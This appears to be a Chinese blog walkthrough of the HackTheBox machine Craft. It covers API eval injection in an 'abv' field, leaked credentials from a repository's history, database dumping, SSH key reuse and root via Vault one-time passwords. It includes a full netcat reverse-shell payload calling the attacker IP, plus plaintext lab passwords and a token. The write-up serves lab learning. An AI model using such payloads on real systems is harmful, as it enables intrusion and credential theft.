Craft


环境

平台:HackTheBox

攻击机:Kali(IP:10.10.14.16)

靶机:Craft(IP:10.10.10.110)

地址:https://www.hackthebox.eu/home/machines/profile/197

Let’s go

nmap -A 10.10.10.110

审查发现两个地址,添加hosts

接下来,慢慢进行探索

发现 /api/brew/ 接口的abv值可能存在问题,并且这个接口需要认证,我们进行进一步检查

果然发现问题,接下来我们需要想办法通过认证

在 test.py 的历史记录中找到用户名 ‘dinesh’ 和密码 ‘4aUh0A8PbVJxgd’

通过得到的用户名和密码获取token

X-Craft-API-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNTc3NjI0NDUwfQ.s3CYce6bX6z2YUjPYBMqCVnt0qzUldXooH7PGAuPWNA
"abv": "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 4343 >/tmp/f"

发现在 docker 中并且找到 dbtest.py,我们可以修改 dbtest.py 中的sql语句查询数据库

SELECT * FROM user

查询到 user 表中的所有用户名和密码

尝试登录仓库,发现 gilfoyle 拥有私人仓库,并且发现SSH密钥

尝试密钥登陆发现警告提示,说id_rsa权限太高

chmod 600 id_rsa
ssh [email protected] -i id_rsa
password:ZEU3N8WNM2rh4T

尝试提权无果,回到仓库注意到 vault ,搜索发现他是用来生成一次性钥匙的

https://www.vaultproject.io/docs/secrets/ssh/one-time-ssh-passwords.html

vault write ssh/creds/root_otp ip=10.10.10.110

ssh [email protected]


文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
Traverxec Traverxec
平台:HackTheBox
攻击机:Kali(IP:10.10.15.145)
靶机:Traverxec(IP:10.10.10.165)
2020-02-03
下一篇 
symfonos-5 symfonos-5
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:symfonos-5(IP:192.168.253.141)
2020-02-03
  目录